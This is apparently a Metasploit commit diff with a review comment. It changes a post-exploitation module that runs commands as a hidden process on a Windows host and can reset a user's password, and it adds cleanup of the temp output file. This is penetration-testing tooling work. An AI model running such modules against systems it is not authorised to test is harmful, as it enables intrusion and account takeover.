Land #9845 Remove temp file after cmd execution

GSoC/Meterpreter_Web_Console
Aaron Soto 2018-04-09 15:40:19 -05:00
commit b83edc0ff6
No known key found for this signature in database
GPG Key ID: A974121808B92094
1 changed files with 16 additions and 10 deletions


@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post
'Description' => %q( 'Description' => %q(
This module will login with the specified username/password and execute the This module will login with the specified username/password and execute the
supplied command as a hidden process. Output is not returned by default, by setting supplied command as a hidden process. Output is not returned by default, by setting
CMDOUT to false output will be redirected to a temp file and read back in to CMDOUT to true output will be redirected to a temp file and read back in to
display. By setting advanced option SETPASS to true, it will reset the users display. By setting advanced option SETPASS to true, it will reset the users
password and then execute the command. password and then execute the command.
), ),
@ -85,14 +85,15 @@ class MetasploitModule < Msf::Post
fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password) fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)
end end
system_temp = get_env('WINDIR') << '\\Temp' # If command output is requested, then create output file and set open permissions
outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt" if cmdout
system_temp = get_env('WINDIR') << '\\Temp'
# Create output file and set permissions so everyone can access outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"
touch(outpath) touch(outpath)
cmdstr = "cmd.exe /c #{cmd} > #{outpath}"
cmdstr = "cmd.exe /c #{cmd}" else
cmdstr = "cmd.exe /c #{cmd} > #{outpath}" if cmdout cmdstr = "cmd.exe /c #{cmd}"
end
# Check privs and execute the correct commands # Check privs and execute the correct commands
# if user use createprocesswithlogon, if system logonuser and createprocessasuser # if user use createprocesswithlogon, if system logonuser and createprocessasuser
@ -119,7 +120,12 @@ class MetasploitModule < Msf::Post
vprint_status("Thread Handle: #{pi[:thread_handle]}") vprint_status("Thread Handle: #{pi[:thread_handle]}")
vprint_status("Process Id: #{pi[:process_id]}") vprint_status("Process Id: #{pi[:process_id]}")
vprint_status("Thread Id: #{pi[:thread_id]}") vprint_status("Thread Id: #{pi[:thread_id]}")
print_status("Command output:\r\n#{tmpout}") unless tmpout.nil? print_status("Command output:\r\n#{tmpout}") if cmdout
end
if cmdout
print_status("Removing temp file #{outpath}")
rm_f(outpath)
end end
end end
end end
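Review bot: The `rm_f(outpath)` added in the last hunk runs only when execution falls through to the end of the method, so a `fail_with` or exception raised after `touch(outpath)` would leave the output file behind in `%WINDIR%\Temp`. The comment above `touch` says the file is given open permissions, so any command output left there would presumably be readable by other local users on the host. The code between the second and third hunks is not visible here, so whether such an early exit exists needs confirming. Moving the removal into an `ensure` clause, with `rm_f(outpath) if outpath` as its body, would make cleanup independent of the path taken. Separately, `get_env('WINDIR') << '\\Temp'` appends in place to the string `get_env` returns; `"#{get_env('WINDIR')}\\Temp"` builds the path without mutating it.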